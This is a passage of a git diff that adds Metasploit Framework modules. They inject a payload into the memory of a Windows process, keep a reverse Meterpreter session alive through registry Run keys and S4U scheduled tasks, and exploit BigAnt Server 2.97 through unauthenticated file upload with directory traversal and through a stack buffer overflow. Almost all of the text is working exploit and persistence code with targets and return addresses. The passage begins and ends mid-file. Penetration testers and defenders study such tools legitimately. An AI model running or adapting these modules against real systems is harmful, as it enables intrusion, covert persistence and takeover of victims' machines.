+ 'uri' => normalize_uri(datastore['PATH'], '/VbBusObj.VbBusObjCls.GetMachineName'),
'agent' => 'ACTIVEDATA',
'headers' =>
{
diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb
new file mode 100644
index 000000000000..ac2ef8c8456e
--- /dev/null
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -0,0 +1,176 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Manage Memory Payload Injection',
+ 'Description' => %q{
+ This module will inject a payload into memory of a process. If a payload
+ isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID
+ datastore option isn't specified, then it'll inject into notepad.exe instead.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Carlos Perez <carlos_perez[at]darkoperator.com>',
+ 'sinn3r'
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [ [ 'Windows', {} ] ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> "Oct 12 2011"
+ ))
+
+ register_options(
+ [
+ OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
+ OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
+ ], self.class)
+ end
+
+ # Run Method for when run command is issued
+ def exploit
+ @payload_name = datastore['PAYLOAD']
+ @payload_arch = framework.payloads.create(@payload_name).arch
+
+ # syinfo is only on meterpreter sessions
+ print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+ pid = get_pid
+ if not pid
+ print_error("Unable to get a proper PID")
+ return
+ end
+
+ if @payload_arch.first =~ /64/ and client.platform =~ /x86/
+ print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
+ print_error("Migrate to an x64 process and try again.")
+ return false
+ else
+ inject_into_pid(pid)
+ end
+ end
+
+ # Figures out which PID to inject to
+ def get_pid
+ pid = datastore['PID']
+ if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
+ print_status("Launching notepad.exe...")
+ pid = create_temp_proc
+ end
+
+ return pid
+ end
+
+
+ # Determines if a PID actually exists
+ def has_pid?(pid)
+ procs = []
+ begin
+ procs = client.sys.process.processes
+ rescue Rex::Post::Meterpreter::RequestError
+ print_error("Unable to enumerate processes")
+ return false
+ end
+
+ pids = []
+
+ procs.each do |p|
+ found_pid = p['pid']
+ return true if found_pid == pid
+ end
+
+ print_error("PID #{pid.to_s} does not actually exist.")
+
+ return false
+ end
+
+ # Checks the Architeture of a Payload and PID are compatible
+ # Returns true if they are false if they are not
+ def arch_check(pid)
+ # get the pid arch
+ client.sys.process.processes.each do |p|
+ # Check Payload Arch
+ if pid == p["pid"]
+ vprint_status("Process found checking Architecture")
+ if @payload_arch.first == p['arch']
+ vprint_good("Process is the same architecture as the payload")
+ return true
+ else
+ print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.")
+ return false
+ end
+ end
+ end
+ end
+
+ # Creates a temp notepad.exe to inject payload in to given the payload
+ # Returns process PID
+ def create_temp_proc()
+ windir = client.fs.file.expand_path("%windir%")
+ # Select path of executable to run depending the architecture
+ if @payload_arch.first== "x86" and client.platform =~ /x86/
+ cmd = "#{windir}\\System32\\notepad.exe"
+ elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/
+ cmd = "#{windir}\\System32\\notepad.exe"
+ elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/
+ cmd = "#{windir}\\Sysnative\\notepad.exe"
+ elsif @payload_arch.first == "x86" and client.platform =~ /x64/
+ cmd = "#{windir}\\SysWOW64\\notepad.exe"
+ end
+
+ begin
+ proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
+ rescue Rex::Post::Meterpreter::RequestError
+ return nil
+ end
+
+ return proc.pid
+ end
+
+ def inject_into_pid(pid)
+ vprint_status("Performing Architecture Check")
+ return if not arch_check(pid)
+
+ begin
+ print_status("Preparing '#{@payload_name}' for PID #{pid}")
+ raw = payload.generate
+
+ print_status("Opening process #{pid.to_s}")
+ host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+ if not host_process
+ print_error("Unable to open #{pid.to_s}")
+ return
+ end
+
+ print_status("Allocating memory in procees #{pid}")
+ mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
+
+ # Ensure memory is set for execution
+ host_process.memory.protect(mem)
+
+ print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
+ print_status("Writing the stager into memory...")
+ host_process.memory.write(mem, raw)
+ host_process.thread.create(mem, 0)
+ print_good("Successfully injected payload in to process: #{pid}")
+
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error("Unable to inject payload:")
+ print_line(e.to_s)
+ end
+ end
+
+end
diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
new file mode 100644
index 000000000000..4c2dcaca1fc2
--- /dev/null
+++ b/modules/exploits/windows/local/persistence.rb
@@ -0,0 +1,202 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Registry
+ include Exploit::EXE
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Manage Persistent Payload Installer',
+ 'Description' => %q{
+ This Module will create a boot persistent reverse Meterpreter session by
+ installing on the target host the payload as a script that will be executed
+ at user logon or system startup depending on privilege and selected startup
+ method.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Carlos Perez <carlos_perez[at]darkoperator.com>'
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [ [ 'Windows', {} ] ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> "Oct 19 2011"
+ ))
+
+ register_options(
+ [
+ OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
+ OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+ OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
+ OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
+ ], self.class)
+
+ end
+
+ # Exploit Method for when exploit command is issued
+ def exploit
+ print_status("Running module against #{sysinfo['Computer']}")
+
+ rexename = datastore['REXENAME']
+ delay = datastore['DELAY']
+ reg_val = datastore['REG_NAME']
+ @clean_up_rc = ""
+ host,port = session.session_host, session.session_port
+
+ exe = generate_payload_exe
+ script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
+ script_on_target = write_script_to_target(script,rexename)
+
+ if script_on_target == nil
+ # exit the module because we failed to write the file on the target host.
+ return
+ end
+
+ # Initial execution of script
+ if target_exec(script_on_target) == nil
+ # Exit if we where not able to run the payload.
+ return
+ end
+
+ case datastore['STARTUP']
+ when /USER/i
+ regwrite = write_to_reg("HKCU", script_on_target, reg_val)
+ # if we could not write the entry in the registy we exit the module.
+ if not regwrite
+ return
+ end
+ when /SYSTEM/i
+ regwrite = write_to_reg("HKLM", script_on_target, reg_val)
+ # if we could not write the entry in the registy we exit the module.
+ if not regwrite
+ return
+ end
+ end
+
+ clean_rc = log_file()
+ file_local_write(clean_rc,@clean_up_rc)
+ print_status("Cleanup Meterpreter RC File: #{clean_rc}")
+
+ report_note(:host => host,
+ :type => "host.persistance.cleanup",
+ :data => {
+ :local_id => session.sid,
+ :stype => session.type,
+ :desc => session.info,
+ :platform => session.platform,
+ :via_payload => session.via_payload,
+ :via_exploit => session.via_exploit,
+ :created_at => Time.now.utc,
+ :commands => @clean_up_rc
+ }
+ )
+ end
+
+ # Function for creating log folder and returning log path
+ def log_file(log_path = nil)
+ #Get hostname
+ host = session.sys.config.sysinfo["Computer"]
+
+ # Create Filename info to be appended to downloaded files
+ filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+ # Create a directory for the logs
+ if log_path
+ logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+ else
+ logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+ end
+
+ # Create the log directory
+ ::FileUtils.mkdir_p(logs)
+
+ #logfile name
+ logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+ return logfile
+ end
+
+ # Writes script to target host
+ def write_script_to_target(vbs,name)
+ tempdir = expand_path("%TEMP%")
+ if name == nil
+ tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+ else
+ tempvbs = tempdir + "\\" + name + ".vbs"
+ end
+ begin
+ write_file(tempvbs, vbs)
+ print_good("Persistent Script written to #{tempvbs}")
+ @clean_up_rc << "rm #{tempvbs}\n"
+ rescue
+ print_error("Could not write the payload on the target hosts.")
+ # return nil since we could not write the file on the target host.
+ tempvbs = nil
+ end
+ return tempvbs
+ end
+
+ # Executes script on target and return the PID of the process
+ def target_exec(script_on_target)
+ execsuccess = true
+ print_status("Executing script #{script_on_target}")
+ # error handling for process.execute() can throw a RequestError in send_request.
+ begin
+ if datastore['EXE::Custom'].nil?
+ session.shell_command_token(script_on_target)
+ else
+ session.shell_command_token("cscript \"#{script_on_target}\"")
+ end
+ rescue
+ print_error("Failed to execute payload on target host.")
+ execsuccess = nil
+ end
+ return execsuccess
+ end
+
+ # Installs payload in to the registry HKLM or HKCU
+ def write_to_reg(key,script_on_target, registry_value)
+ # Lets start to assume we had success.
+ write_success = true
+ if registry_value.nil?
+ nam = Rex::Text.rand_text_alpha(rand(8)+8)
+ else
+ nam = registry_value
+ end
+
+ print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
+
+ if(key)
+ set_return = registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
+ if set_return
+ print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
+ else
+ print_error("Failed to make entry in the registry for persistence.")
+ write_success = false
+ end
+ else
+ print_error("Error: failed to open the registry key for writing")
+ write_success = false
+ end
+ end
+
+end
diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb
new file mode 100644
index 000000000000..188b8e643c28
--- /dev/null
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@@ -0,0 +1,385 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Exploit::EXE
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Manage User Level Persistent Payload Installer',
+ 'Description' => %q{
+ Creates a scheduled task that will run using service-for-user (S4U).
+ This allows the scheduled task to run even as an unprivileged user
+ that is not logged into the device. This will result in lower security
+ context, allowing access to local resources only. The module
+ requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
+ 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+ ],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [ [ 'Windows', {} ] ],
+ 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
+ 'DefaultTarget' => 0,
+ 'References' => [
+ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'],
+ [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/']
+ ]
+ ))
+
+ register_options(
+ [
+ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
+ OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']),
+ OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]),
+ OptString.new('REXENAME',[false, 'Name of exe on remote system']),
+ OptString.new('RTASKNAME',[false, 'Name of exe on remote system']),
+ OptString.new('PATH',[false, 'PATH to write payload'])
+ ], self.class)
+
+ register_advanced_options(
+ [
+ OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']),
+ OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']),
+ OptString.new('XPATH', [false, 'XPath query'])
+ ], self.class)
+ end
+
+ def exploit
+ if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/)
+ fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above")
+ end
+
+ if datastore['TRIGGER'] == "event"
+ if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil?
+ print_status("The properties of any event in the event viewer will contain this information")
+ fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event")
+ end
+ end
+
+ # Generate payload
+ payload = generate_payload_exe
+
+ # Generate remote executable name
+ rexename = generate_rexename
+
+ # Generate path names
+ xml_path,rexe_path = generate_path(rexename)
+
+ # Upload REXE to victim fs
+ upload_rexe(rexe_path, payload)
+
+ # Create basic XML outline
+ xml = create_xml(rexe_path)
+
+ # Fix XML based on trigger
+ xml = add_xml_triggers(xml)
+
+ # Write XML to victim fs, if fail clean up
+ write_xml(xml, xml_path, rexe_path)
+
+ # Name task with Opt or give random name
+ schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+
+ # Create task with modified XML
+ create_task(xml_path, schname, rexe_path)
+ end
+
+ ##############################################################
+ # Generate name for payload
+ # Returns name
+
+ def generate_rexename
+ rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+ if not rexename =~ /\.exe$/
+ print_warning("#{datastore['REXENAME']} isn't an exe")
+ end
+ return rexename
+ end
+
+ ##############################################################
+ # Generate Path for payload upload
+ # Returns path for xml and payload
+
+ def generate_path(rexename)
+ # generate a path to write payload and xml
+ path = datastore['PATH'] || expand_path("%TEMP%")
+ xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
+ rexe_path = "#{path}\\#{rexename}"
+ return xml_path,rexe_path
+ end
+
+ ##############################################################
+ # Upload the executable payload
+ # Returns boolean for success
+
+ def upload_rexe(path, payload)
+ vprint_status("Uploading #{path}")
+ if file? path
+ fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
+ end
+ begin
+ write_file(path, payload)
+ rescue => e
+ fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}")
+ end
+ print_status("Successfully uploaded remote executable to #{path}")
+ end
+
+ ##############################################################
+ # Creates a scheduled task, exports as XML, deletes task
+ # Returns normal XML for generic task
+
+ def create_xml(rexe_path)
+ xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml")
+ xml_file = File.new(xml_path,"r")
+ xml = xml_file.read
+ xml_file.close
+
+ # Get local time, not system time from victim machine
+ begin
+ vt = client.railgun.kernel32.GetLocalTime(32)
+ ut = vt['lpSystemTime'].unpack("v*")
+ t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
+ rescue
+ print_warning("Could not read system time from victim...using your local time to determine creation date")
+ t = ::Time.now
+ end
+ date = t.strftime("%Y-%m-%d")
+ time = t.strftime("%H:%M:%S")
+
+ # put in correct times
+ xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
+
+ domain, user = client.sys.config.getuid.split('\\')
+
+ # put in user information
+ xml = xml.sub(/DOMAINHERE/, user)
+ xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
+
+ xml = xml.sub(/COMMANDHERE/, rexe_path)
+ return xml
+ end
+
+ ##############################################################
+ # Takes the XML, alters it based on trigger specified. Will also
+ # add in expiration tag if used.
+ # Returns the modified XML
+
+ def add_xml_triggers(xml)
+ # Insert trigger
+ case datastore['TRIGGER']
+ when 'logon'
+ # Trigger based on winlogon event, checks windows license key after logon
+ print_status("This trigger triggers on event 4101 which validates the Windows license")
+ line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
+ xml = create_trigger_event_tags("Application", line, xml)
+
+ when 'lock'
+ xml = create_trigger_tags("SessionLock", xml)
+
+ when 'unlock'
+ xml = create_trigger_tags("SessionUnlock", xml)
+
+ when 'event'
+ line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
+ if not datastore['XPATH'].nil? and not datastore['XPATH'].empty?
+ # Append xpath queries
+ line << " and #{datastore['XPATH']}"
+ # Print XPath query, useful to user to spot issues with uncommented single quotes
+ print_status("XPath query: #{line}")
+ end
+
+ xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
+
+ when 'schedule'
+ # Change interval tag, insert into XML
+ if datastore['FREQUENCY'] != 0
+ minutes = datastore['FREQUENCY']
+ else
+ print_status("Defaulting frequency to every hour")
+ minutes = 60
+ end
+ xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
+
+ # Insert expire tag if not 0
+ unless datastore['EXPIRE_TIME'] == 0
+ # Generate expire tag
+ end_boundary = create_expire_tag
+ # Inject expire tag
+ insert = xml.index("</StartBoundary>")
+ xml.insert(insert + 16, "\n #{end_boundary}")
+ end
+ end
+ return xml
+ end
+
+ ##############################################################
+ # Creates end boundary tag which expires the trigger
+ # Returns XML for expire
+
+ def create_expire_tag()
+ # Get local time, not system time from victim machine
+ begin
+ vt = client.railgun.kernel32.GetLocalTime(32)
+ ut = vt['lpSystemTime'].unpack("v*")
+ t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
+ rescue
+ print_error("Could not read system time from victim...using your local time to determine expire date")
+ t = ::Time.now
+ end
+
+ # Create time object to add expire time to and create tag
+ t = t + (datastore['EXPIRE_TIME'] * 60)
+ date = t.strftime("%Y-%m-%d")
+ time = t.strftime("%H:%M:%S")
+ end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
+ return end_boundary
+ end
+
+ ##############################################################
+ # Creates trigger XML for session state triggers and replaces
+ # the time trigger.
+ # Returns altered XML
+
+ def create_trigger_tags(trig, xml)
+ domain, user = client.sys.config.getuid.split('\\')
+
+ # Create session state trigger, weird spacing used to maintain
+ # natural Winadows spacing for XML export
+ temp_xml = "<SessionStateChangeTrigger>\n"
+ temp_xml << " #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0
+ temp_xml << " <Enabled>true</Enabled>\n"
+ temp_xml << " <StateChange>#{trig}</StateChange>\n"
+ temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n"
+ temp_xml << " </SessionStateChangeTrigger>"
+
+ xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)
+
+ return xml
+ end
+
+ ##############################################################
+ # Creates trigger XML for event based triggers and replaces
+ # the time trigger.
+ # Returns altered XML
+
+ def create_trigger_event_tags(log, line, xml)
+ # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind
+ # used to maintain natural Windows spacing for XML export
+ temp_xml = "<EventTrigger>\n"
+ temp_xml << " #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0
+ temp_xml << " <Enabled>true</Enabled>\n"
+ temp_xml << " <Subscription><QueryList><Query Id=\"0\" "
+ temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">"
+ temp_xml << line
+ temp_xml << "</Select></Query></QueryList>"
+ temp_xml << "</Subscription>\n"
+ temp_xml << " </EventTrigger>"
+
+ xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)
+ return xml
+ end
+
+ ##############################################################
+ # Takes the XML and a path and writes file to filesystem
+ # Returns boolean for success
+
+ def write_xml(xml, path, rexe_path)
+ if file? path
+ delete_file(rexe_path)
+ fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
+ end
+ begin
+ write_file(path, xml)
+ rescue
+ delete_file(rexe_path)
+ fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}")
+ end
+ print_status("Successfully wrote XML file to #{path}")
+ end
+
+ ##############################################################
+ # Takes path and delete file
+ # Returns boolean for success
+
+ def delete_file(path)
+ begin
+ file_rm(path)
+ rescue
+ print_warning("Could not delete file #{path}, delete manually")
+ end
+ end
+
+ ##############################################################
+ # Takes path and name for task and creates final task
+ # Returns boolean for success
+
+ def create_task(path, schname, rexe_path)
+ # create task using XML file on victim fs
+ create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")
+ if create_task_response =~ /has successfully been created/
+ print_good("Persistence task #{schname} created successfully")
+
+ # Create to delete commands for exe and task
+ del_task = "schtasks /delete /tn \"#{schname}\" /f"
+ print_status("#{"To delete task:".ljust(20)} #{del_task}")
+ print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}")
+ del_task << "\ndel #{rexe_path}"
+
+ # Delete XML from victim
+ delete_file(path)
+
+ # Save info to notes DB
+ report_note(:host => session.session_host,
+ :type => "host.s4u_persistance.cleanup",
+ :data => {
+ :session_num => session.sid,
+ :stype => session.type,
+ :desc => session.info,
+ :platform => session.platform,
+ :via_payload => session.via_payload,
+ :via_exploit => session.via_exploit,
+ :created_at => Time.now.utc,
+ :delete_commands => del_task
+ }
+ )
+ elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
+ # Clean up
+ delete_file(rexe_path)
+ delete_file(path)
+ error = "The scheduled task name is already in use"
+ fail_with(Exploit::Failure::Unknown, error)
+ else
+ error = "Issues creating task using XML file schtasks"
+ vprint_error("Error: #{create_task_response}")
+ if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event"
+ print_warning("Security log can restricted by UAC, try a different trigger")
+ end
+ # Clean up
+ delete_file(rexe_path)
+ delete_file(path)
+ fail_with(Exploit::Failure::Unknown, error)
+ end
+ end
+end
diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
new file mode 100644
index 000000000000..769d2e22527c
--- /dev/null
+++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
@@ -0,0 +1,127 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::EXE
+ include Msf::Exploit::WbemExec
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'BigAnt Server DUPF Command Arbitrary File Upload',
+ 'Description' => %q{
+ This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.
+ A lack of authentication allows to make unauthenticated file uploads through a DUPF
+ command. Additionally the filename option in the same command can be used to launch
+ a directory traversal attack and achieve arbitrary file upload.
+
+ The module uses uses the Windows Management Instrumentation service to execute an
+ arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It
+ has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003
+ SP2.
+ },
+ 'Author' =>
+ [
+ 'Hamburgers Maccoy', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2012-6274' ],
+ [ 'US-CERT-VU', '990652' ],
+ [ 'BID', '57214' ],
+ [ 'OSVDB', '89342' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'BigAnt Server 2.97 SP7', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10
+ },
+ 'DisclosureDate' => 'Jan 09 2013'))
+
+ register_options(
+ [
+ Opt::RPORT(6661),
+ OptInt.new('DEPTH', [true, "Levels to reach base directory", 6])
+ ], self.class)
+
+ end
+
+ def upload_file(filename, content)
+
+ random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"
+
+ dupf = "DUPF 16\n"
+ dupf << "cmdid: 1\n"
+ dupf << "content-length: #{content.length}\n"
+ dupf << "content-type: Appliction/Download\n"
+ dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n"
+ dupf << "modified: #{random_date}\n"
+ dupf << "pclassid: 102\n"
+ dupf << "pobjid: 1\n"
+ dupf << "rootid: 1\n"
+ dupf << "sendcheck: 1\n\n"
+ dupf << content
+
+ print_status("sending DUPF")
+ connect
+ sock.put(dupf)
+ res = sock.get_once
+ disconnect
+ return res
+
+ end
+
+ def exploit
+
+ peer = "#{rhost}:#{rport}"
+
+ # Setup the necessary files to do the wbemexec trick
+ exe_name = rand_text_alpha(rand(10)+5) + '.exe'
+ exe = generate_payload_exe
+ mof_name = rand_text_alpha(rand(10)+5) + '.mof'
+ mof = generate_mof(mof_name, exe_name)
+
+ print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
+ res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)
+ if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
+ print_good("#{peer} - #{exe_name} uploaded successfully")
+ else
+ if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/
+ print_error("#{peer} - Upload failed, check the DEPTH option")
+ end
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}")
+ end
+
+ print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
+ res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+ if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
+ print_good("#{peer} - #{mof_name} uploaded successfully")
+ register_file_for_cleanup(exe_name)
+ register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
+ else
+ if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/
+ print_error("#{peer} - Upload failed, check the DEPTH option")
+ end
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")
+ end
+
+ end
+
+end
diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb
new file mode 100644
index 000000000000..f72d6c171d24
--- /dev/null
+++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb
@@ -0,0 +1,183 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'BigAnt Server 2 SCH And DUPF Buffer Overflow',
+ 'Description' => %q{
+ This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The
+ vulnerability is due to the dangerous usage of strcpy while handling errors. This
+ module uses a combination of SCH and DUPF request to trigger the vulnerability, and
+ has been tested successfully against version 2.97 SP7 over Windows XP SP3 and
+ Windows 2003 SP2.
+ },
+ 'Author' =>
+ [
+ 'Hamburgers Maccoy', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2012-6275' ],
+ [ 'US-CERT-VU', '990652' ],
+ [ 'BID', '57214' ],
+ [ 'OSVDB', '89344' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2500,
+ 'BadChars' => "\x00\x0a\x0d\x25\x27",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'BigAnt Server 2.97 SP7 / Windows XP SP3',
+ {
+ 'Offset' => 629,
+ 'Ret' => 0x77c21ef4, # ppr from msvcrt
+ 'JmpESP' => 0x77c35459, # push esp # ret from msvcrt
+ 'FakeObject' => 0x77C60410 # .data from msvcrt
+ }
+ ],
+ [ 'BigAnt Server 2.97 SP7 / Windows 2003 SP2',
+ {
+ 'Offset' => 629,
+ 'Ret' => 0x77bb287a, # ppr from msvcrt
+ 'FakeObject' => 0x77bf2460, # .data from msvcrt
